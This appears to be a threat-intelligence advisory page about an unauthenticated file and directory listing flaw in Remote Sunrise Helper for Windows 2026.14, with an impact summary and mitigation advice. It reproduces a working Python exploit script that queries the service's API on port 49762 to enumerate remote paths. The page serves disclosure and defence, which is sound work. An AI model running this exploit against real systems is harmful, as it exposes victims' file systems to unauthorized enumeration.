Remote Sunrise Helper for Windows 2026.14 - Unauthenticated File/Directory Listing
Remote Sunrise Helper for Windows version 2026. 14 has an unauthenticated file and directory listing vulnerability. This allows an attacker to remotely access file and directory information without authentication. The vulnerability affects Windows 10 and Windows 11 systems running this software. Exploit code is publicly available in Python, demonstrating how to enumerate files remotely. No official patch or remediation information is provided at this time. The severity is assessed as medium based on the ability to list files without authentication but no direct evidence of further exploitation or impact is described.
AI Analysis
Technical Summary
Remote Sunrise Helper for Windows 2026.14 contains a vulnerability that permits unauthenticated remote attackers to list files and directories via the application's API. The exploit works by sending HTTP GET requests to the /api/listFiles endpoint on port 49762, bypassing authentication if the server indicates that authentication is not required. The provided Python exploit script automates this process, allowing enumeration of arbitrary file paths remotely. The vulnerability was tested on Windows 10 and Windows 11 platforms. No vendor advisory or patch information is available, and no known exploits in the wild have been reported.
Potential Impact
An unauthenticated attacker can remotely enumerate files and directories on a vulnerable Remote Sunrise Helper for Windows 2026.14 installation. This could lead to information disclosure about the file system structure and potentially sensitive files. There is no indication of privilege escalation or code execution from this vulnerability alone. No known active exploitation has been reported.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict network access to the Remote Sunrise Helper service port (49762) to trusted users only. Monitor for unauthorized access attempts. If the service configuration allows, enable authentication to prevent unauthenticated access.
Indicators of Compromise
- exploit-code: #!/usr/bin/env python3 # Exploit Title: Remote Sunrise Helper for Windows 2026.14 - Unauthenticated File/Directory Listing # Date: 2026-04-20 # Exploit Author: Chokri Hammedi # Software: https://rs.ltd/latest.php?os=win # Vendor: https://rs.ltd/ # Version: 2026.14 # Tested on: Windows 10 / Windows 11 import requests, json, sys, urllib3 from urllib.parse import quote urllib3.disable_warnings() if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [path]") print(f"Example: {sys.argv[0]} 192.168.1.103") print(f"Example: {sys.argv[0]} 192.168.1.103 'C:/Users'") print(f"Example: {sys.argv[0]} 192.168.1.103 '%USERPROFILE%/Desktop'") sys.exit(1) target = sys.argv[1] path = sys.argv[2] if len(sys.argv) > 2 else "" url = f"https://{target}:49762" headers = {"X-HostName": "a", "X-ClientToken": "a", "X-HostFullModel": "a"} r = requests.get(f"{url}/api/getVersion", verify=False, timeout=5) data = r.json() if data.get("requires.auth") == False: if path: encoded = quote(path, safe='') r = requests.get(f"{url}/api/listFiles={encoded}", headers=headers, verify=False) else: r = requests.get(f"{url}/api/listFiles", headers=headers, verify=False) print(json.dumps(r.json(), indent=2)) else: print("[*] Not vulnerable - authentication required")
Remote Sunrise Helper for Windows 2026.14 - Unauthenticated File/Directory Listing
Description
Remote Sunrise Helper for Windows version 2026. 14 has an unauthenticated file and directory listing vulnerability. This allows an attacker to remotely access file and directory information without authentication. The vulnerability affects Windows 10 and Windows 11 systems running this software. Exploit code is publicly available in Python, demonstrating how to enumerate files remotely. No official patch or remediation information is provided at this time. The severity is assessed as medium based on the ability to list files without authentication but no direct evidence of further exploitation or impact is described.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
Remote Sunrise Helper for Windows 2026.14 contains a vulnerability that permits unauthenticated remote attackers to list files and directories via the application's API. The exploit works by sending HTTP GET requests to the /api/listFiles endpoint on port 49762, bypassing authentication if the server indicates that authentication is not required. The provided Python exploit script automates this process, allowing enumeration of arbitrary file paths remotely. The vulnerability was tested on Windows 10 and Windows 11 platforms. No vendor advisory or patch information is available, and no known exploits in the wild have been reported.
Potential Impact
An unauthenticated attacker can remotely enumerate files and directories on a vulnerable Remote Sunrise Helper for Windows 2026.14 installation. This could lead to information disclosure about the file system structure and potentially sensitive files. There is no indication of privilege escalation or code execution from this vulnerability alone. No known active exploitation has been reported.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict network access to the Remote Sunrise Helper service port (49762) to trusted users only. Monitor for unauthorized access attempts. If the service configuration allows, enable authentication to prevent unauthenticated access.
Technical Details
- Edb Id
- 52566
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Remote Sunrise Helper for Windows 2026.14 - Unauthenticated File/Directory Listing
#!/usr/bin/env python3 # Exploit Title: Remote Sunrise Helper for Windows 2026.14 - Unauthenticated File/Directory Listing # Date: 2026-04-20 # Exploit Author: Chokri Hammedi # Software: https://rs.ltd/latest.php?os=win # Vendor: https://rs.ltd/ # Version: 2026.14 # Tested on: Windows 10 / Windows 11 import requests, json, sys, urllib3 from urllib.parse import quote urllib3.disable_warnings() if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [path]") print(f"Example: {sys.... (817 more characters)
Threat ID: 6a084e9bec166c07b0dd9368
Added to database: 5/16/2026, 11:01:47 AM
Last enriched: 5/16/2026, 11:01:55 AM
Last updated: 5/17/2026, 6:26:20 AM
Views: 14
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.